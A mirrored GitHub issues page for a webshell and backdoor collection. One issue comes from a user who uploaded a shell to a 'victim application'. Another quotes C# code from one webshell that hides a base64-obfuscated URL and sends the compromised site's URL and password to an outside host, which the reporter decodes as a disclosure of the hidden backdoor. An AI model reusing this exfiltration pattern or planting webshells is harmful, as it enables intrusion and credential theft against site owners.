Giter Site home page Giter Site logo

xl7dev / webshell Goto Github PK

View Code? Open in Web Editor NEW
1.8K 60.0 1.0K 23.98 MB

Webshell && Backdoor Collection

Home Page: http://blog.safebuff.com/WebShell/

License: GNU General Public License v2.0

ASP 32.66% C 0.60% ColdFusion 0.08% Perl 2.92% Java 12.17% HTML 0.45% PHP 49.61% JavaScript 0.06% Python 1.10% Ruby 0.16% Shell 0.07% CSS 0.06% M4 0.01% C++ 0.01% Makefile 0.01% PowerShell 0.07%
webshell shell rootkit backdoor

webshell's Issues

web shell upload

l uploaded your shell to a victim application and immediately after upload it crashed instead of creating a backdoor why?

Backdoor in webshell

Here is one I found.

HttpWebRequest request = (HttpWebRequest)HttpWebRequest.Create(YfCnP + this.Request.Url.ToString() + pbzw + Password + ""); HttpWebResponse response = (HttpWebResponse)request.GetResponse();

Variable YfCnP is base64 encoded.
string YfCnP = sh;
YfCnP += portble;
YfCnP += vcf;
YfCnP += dwgtg;
YfCnP += bin_data;
YfCnP += fuze;
YfCnP += ouj;
YfCnP += tprq;
YfCnP += idodr;
YfCnP += mtg;
YfCnP += ksgr;

ksgr = Encoding.Default.GetString(Convert.FromBase64String(ksgr));
mtg = Encoding.Default.GetString(Convert.FromBase64String(mtg));
idodr = Encoding.Default.GetString(Convert.FromBase64String(idodr));
tprq = Encoding.Default.GetString(Convert.FromBase64String(tprq));
ouj = Encoding.Default.GetString(Convert.FromBase64String(ouj));
fuze = Encoding.Default.GetString(Convert.FromBase64String(fuze));
bin_data = Encoding.Default.GetString(Convert.FromBase64String(bin_data));
dwgtg = Encoding.Default.GetString(Convert.FromBase64String(dwgtg));
vcf = Encoding.Default.GetString(Convert.FromBase64String(vcf));
portble = Encoding.Default.GetString(Convert.FromBase64String(portble));
sh = Encoding.Default.GetString(Convert.FromBase64String(sh));

string sh = "aHR0";

string portble = "cDovLw==";

string vcf = "d3c=";

string dwgtg = "dy50cm95";

string bin_data = "cGxhbi4=";

string fuze = "Y29tL2FydGlj";

string ouj = "bGUvaQ==";

string tprq = "bmZvLw==";

string idodr = "Z2suYXM=";

string mtg = "cHg=";

string ksgr = "P25hbWU9";

Decode YfCnP:
http://www.troyplan.com/article/info/gk.aspx?name=
Maybe there are more backdoors in webshells, use with caution.

Don't be evil.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.